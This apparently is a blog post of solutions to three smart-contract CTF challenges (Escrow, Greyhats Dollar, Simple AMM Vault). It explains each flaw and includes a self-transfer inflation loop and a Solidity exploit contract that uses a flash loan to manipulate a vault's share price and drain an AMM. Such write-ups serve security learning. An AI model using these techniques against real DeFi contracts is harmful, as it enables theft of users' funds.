<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="EscrowDescription Introducing NFT-based escrows - you can deposit assets and trade escrows by selling your ownership NFT! However, I accidentally renounced ownership for my own escrow. Can you help me">
<meta property="og:type" content="article">
<meta property="og:title" content="NusgreyhatsCTF_Solutions">
<meta property="og:url" content="http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/index.html">
<meta property="og:site_name" content="KK&#39;s Note">
<meta property="og:description" content="EscrowDescription Introducing NFT-based escrows - you can deposit assets and trade escrows by selling your ownership NFT! However, I accidentally renounced ownership for my own escrow. Can you help me">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-04-23T09:49:19.000Z">
<meta property="article:modified_time" content="2024-04-24T02:08:17.645Z">
<meta property="article:author" content="KKontheway">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>NusgreyhatsCTF_Solutions</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.0.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Archives</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/kkontheway">Projects</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/04/28/Lending-Borrow-Attack/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/04/12/UnderstandEVM/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&text=NusgreyhatsCTF_Solutions"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&title=NusgreyhatsCTF_Solutions"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&is_video=false&description=NusgreyhatsCTF_Solutions"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=NusgreyhatsCTF_Solutions&body=Check out this article: http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&title=NusgreyhatsCTF_Solutions"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&title=NusgreyhatsCTF_Solutions"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&title=NusgreyhatsCTF_Solutions"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&title=NusgreyhatsCTF_Solutions"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&name=NusgreyhatsCTF_Solutions&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&t=NusgreyhatsCTF_Solutions"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Escrow"><span class="toc-number">1.</span> <span class="toc-text">Escrow</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Description"><span class="toc-number">1.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Goal"><span class="toc-number">1.2.</span> <span class="toc-text">Goal</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Code"><span class="toc-number">1.3.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Solution"><span class="toc-number">1.4.</span> <span class="toc-text">Solution</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Exp"><span class="toc-number">1.5.</span> <span class="toc-text">Exp</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Greyhats-Dollar"><span class="toc-number">2.</span> <span class="toc-text">Greyhats Dollar</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Description-1"><span class="toc-number">2.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Goal-1"><span class="toc-number">2.2.</span> <span class="toc-text">Goal</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Solution-1"><span class="toc-number">2.3.</span> <span class="toc-text">Solution</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Exp-1"><span class="toc-number">2.4.</span> <span class="toc-text">Exp</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Simple-Amm-Vault"><span class="toc-number">3.</span> <span class="toc-text">Simple Amm Vault</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Description-2"><span class="toc-number">3.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Goal-2"><span class="toc-number">3.2.</span> <span class="toc-text">Goal</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Code-1"><span class="toc-number">3.3.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Solution-2"><span class="toc-number">3.4.</span> <span class="toc-text">Solution</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Exp-2"><span class="toc-number">3.5.</span> <span class="toc-text">Exp</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        NusgreyhatsCTF_Solutions
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">KKontheway</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-04-23T09:49:19.000Z" class="dt-published" itemprop="datePublished">2024-04-23</time>
        
        (Updated: <time datetime="2024-04-24T02:08:17.645Z" class="dt-updated" itemprop="dateModified">2024-04-24</time>)
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="Escrow"><a href="#Escrow" class="headerlink" title="Escrow"></a>Escrow</h2><h3 id="Description"><a href="#Description" class="headerlink" title="Description"></a>Description</h3><hr>
<p>Introducing NFT-based escrows - you can deposit assets and trade escrows by selling your ownership NFT! However, I accidentally renounced ownership for my own escrow. Can you help me recover the funds?</p>
<h3 id="Goal"><a href="#Goal" class="headerlink" title="Goal"></a>Goal</h3><hr>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grey.balanceOf(address(escrow)) == 0 &amp;&amp; grey.balanceOf(msg.sender) &gt;= 10_000e18;</span><br></pre></td></tr></table></figure>
<h3 id="Code"><a href="#Code" class="headerlink" title="Code"></a>Code</h3><hr>
<p>DualAssetEscrow.sol:</p>
<ul>
<li>This is an escrow contract for holding two types of assets (tokenX and tokenY).</li>
<li>The contract uses the Clone library to deploy new instances of the escrow contract through cloning.</li>
<li>The contract has an initialize function to initialize the escrow and check the validity of the passed arguments.</li>
<li>The owner function returns the current owner of the escrow contract, which is the address holding the EscrowFactory NFT.</li>
</ul>
<p>EscrowFactory.sol:</p>
<ul>
<li>This is an escrow factory contract for deploying and managing DualAssetEscrow contracts.</li>
<li>The contract inherits the ERC721 standard to represent ownership of the escrow contracts.</li>
<li>The addImplementation function is used to add implementations of the escrow contract and can only be called by the owner of the factory contract.</li>
<li>The deployEscrow function is used to deploy new escrow contracts and mint an ERC721 token to represent ownership of the escrow contract.</li>
<li>The renounceOwnership function is used to permanently renounce ownership of an escrow contract.</li>
</ul>
<p>Setup.sol:</p>
<ul>
<li>This is a contract for setting up the challenge and checking the completion of the challenge.</li>
<li>In the constructor, the contract deploys the GREY token contract, the EscrowFactory contract, and an instance of the DualAssetEscrow contract.</li>
<li>The contract deposits 10,000 GREY into the escrow contract and then renounces ownership of the escrow contract.</li>
</ul>
<h3 id="Solution"><a href="#Solution" class="headerlink" title="Solution"></a>Solution</h3><hr>
<p>Owner goal is to Drain the escrow contract, we can see we drop the ownership of escrow, so we need to be the owner then we can drain the funds.</p>
<p>In <code>DualAssetEscrow::withdraw()</code> the check is use <code>(msg.sender != owner())</code> not the actual address.</p>
<p>So we just need to fake the escrowId, get the same escrowId <code>0</code>, then we can attack successfully.</p>
<p>First we need to pass the <code>deployEscrow()</code>，we can find that <code>address public constant ETH_ADDRESS = address(0);</code>, so if can fake the escrowId by <code>(grey,bytes19(abi.encodePacked(address(0)));)</code></p>
<p>than we can pass <code>if (deployedParams[paramsHash]) revert AlreadyDeployed();</code></p>
<h3 id="Exp"><a href="#Exp" class="headerlink" title="Exp"></a>Exp</h3><hr>
<p><a href="">Github</a>(will push it later)</p>
<h2 id="Greyhats-Dollar"><a href="#Greyhats-Dollar" class="headerlink" title="Greyhats Dollar"></a>Greyhats Dollar</h2><hr>
<h3 id="Description-1"><a href="#Description-1" class="headerlink" title="Description"></a>Description</h3><hr>
<p>Worried about inflation? Introducing GreyHats Dollar (GHD), the world’s first currency with deflation built-in! Backed by GREY tokens, GHD will automatically deflate at a rate of 3% every year.</p>
<h3 id="Goal-1"><a href="#Goal-1" class="headerlink" title="Goal"></a>Goal</h3><hr>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ghd.balanceOf(msg.sender) &gt;= 50_000e18;</span><br></pre></td></tr></table></figure>

<h3 id="Solution-1"><a href="#Solution-1" class="headerlink" title="Solution"></a>Solution</h3><hr>
<p>Just the self transfer issue, we just need to transfer to ourselves, until our balance reached 50000e18.</p>
<h3 id="Exp-1"><a href="#Exp-1" class="headerlink" title="Exp"></a>Exp</h3><hr>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">while (balance &lt; 50_000e18) &#123;</span><br><span class="line">            setup.ghd().transfer(address(this), balance);</span><br><span class="line">            balance = setup.ghd().balanceOf(address(this));</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<h2 id="Simple-Amm-Vault"><a href="#Simple-Amm-Vault" class="headerlink" title="Simple Amm Vault"></a>Simple Amm Vault</h2><h3 id="Description-2"><a href="#Description-2" class="headerlink" title="Description"></a>Description</h3><hr>
<p>ERC-4626 was too complex, so I made an AMM to swap between shares and assets</p>
<h3 id="Goal-2"><a href="#Goal-2" class="headerlink" title="Goal"></a>Goal</h3><hr>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grey.balanceOf(msg.sender) &gt;= 3000e18;</span><br></pre></td></tr></table></figure>

<h3 id="Code-1"><a href="#Code-1" class="headerlink" title="Code"></a>Code</h3><hr>
<p>SimpleAMM.sol:</p>
<ul>
<li>Simple AMM, Take SV and Grey Token</li>
<li>Price From Vault by sharePrice()</li>
<li>swap() have the modifier invariant</li>
</ul>
<p>SetUp.sol:</p>
<ul>
<li>Create AMM and Vault</li>
<li>deposit 1000e18 GREY to Vault and distribute 1000e18 GREY</li>
<li>claim() function give msg.sender 1000e18 GREY</li>
</ul>
<p>SimpleVault.sol:</p>
<ul>
<li>deposit GREY and get SV</li>
</ul>
<h3 id="Solution-2"><a href="#Solution-2" class="headerlink" title="Solution"></a>Solution</h3><hr>
<p>From setup, we can see that there are 2000e18 assets in Vault, but only 1000e18 SV was minted.</p>
<p>If we want to swap in AMM, we need to pass the invariant, but now the price is 2000:1000 &#x3D; 2<br>the k is set to 3000, but the reserveX and reserveY only 1000e18, so first we need to change the price by using flashloan in amm.</p>
<p>that’s the answer:</p>
<ol>
<li>flashloan 1000e18 SV</li>
<li>burn and get 2000e18 GREY back</li>
<li>deposit 1000e18 GREY to vault, make the price to 1</li>
<li>call swap() to drain all GREY in amm.</li>
</ol>
<h3 id="Exp-2"><a href="#Exp-2" class="headerlink" title="Exp"></a>Exp</h3><hr>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">contract Exploit &#123;</span><br><span class="line">    Setup setup;</span><br><span class="line"></span><br><span class="line">    constructor(address _setup) &#123;</span><br><span class="line">        setup = Setup(_setup);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function solve() external &#123;</span><br><span class="line">        // Claim 1000 GREY</span><br><span class="line">        setup.claim();</span><br><span class="line"></span><br><span class="line">        // Flash loan 1000 SV from the AMM</span><br><span class="line">        setup.amm().flashLoan(true, 1000e18, &quot;&quot;);</span><br><span class="line"></span><br><span class="line">        // Drain 1000 GREY from the AMM</span><br><span class="line">        setup.amm().swap(true, 0, 1000e18);</span><br><span class="line"></span><br><span class="line">        // Transfer all GREY to msg.sender</span><br><span class="line">        setup.grey().transfer(msg.sender, setup.grey().balanceOf(address(this)));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function onFlashLoan(uint256 svAmount, bytes calldata) external &#123;</span><br><span class="line">        // Burn 1000 SV for 2000 GREY</span><br><span class="line">        setup.vault().withdraw(svAmount);</span><br><span class="line"></span><br><span class="line">        // Deposit 1000 GREY for 1000 SV. Share price is now 1:1</span><br><span class="line">        setup.grey().approve(address(setup.vault()), 1000e18);</span><br><span class="line">        setup.vault().deposit(1000e18);</span><br><span class="line"></span><br><span class="line">        // Approve SV for AMM to return the flash loan</span><br><span class="line">        setup.vault().approve(address(setup.amm()), svAmount);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Archives</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/kkontheway">Projects</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/categories/">Category</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Escrow"><span class="toc-number">1.</span> <span class="toc-text">Escrow</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Description"><span class="toc-number">1.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Goal"><span class="toc-number">1.2.</span> <span class="toc-text">Goal</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Code"><span class="toc-number">1.3.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Solution"><span class="toc-number">1.4.</span> <span class="toc-text">Solution</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Exp"><span class="toc-number">1.5.</span> <span class="toc-text">Exp</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Greyhats-Dollar"><span class="toc-number">2.</span> <span class="toc-text">Greyhats Dollar</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Description-1"><span class="toc-number">2.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Goal-1"><span class="toc-number">2.2.</span> <span class="toc-text">Goal</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Solution-1"><span class="toc-number">2.3.</span> <span class="toc-text">Solution</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Exp-1"><span class="toc-number">2.4.</span> <span class="toc-text">Exp</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Simple-Amm-Vault"><span class="toc-number">3.</span> <span class="toc-text">Simple Amm Vault</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Description-2"><span class="toc-number">3.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Goal-2"><span class="toc-number">3.2.</span> <span class="toc-text">Goal</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Code-1"><span class="toc-number">3.3.</span> <span class="toc-text">Code</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Solution-2"><span class="toc-number">3.4.</span> <span class="toc-text">Solution</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Exp-2"><span class="toc-number">3.5.</span> <span class="toc-text">Exp</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&text=NusgreyhatsCTF_Solutions"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&title=NusgreyhatsCTF_Solutions"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&is_video=false&description=NusgreyhatsCTF_Solutions"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=NusgreyhatsCTF_Solutions&body=Check out this article: http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&title=NusgreyhatsCTF_Solutions"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&title=NusgreyhatsCTF_Solutions"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&title=NusgreyhatsCTF_Solutions"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&title=NusgreyhatsCTF_Solutions"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&name=NusgreyhatsCTF_Solutions&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/04/23/NusgreyhatsCTF-Solutions/&t=NusgreyhatsCTF_Solutions"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2024
    KKontheway
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Archives</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/kkontheway">Projects</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
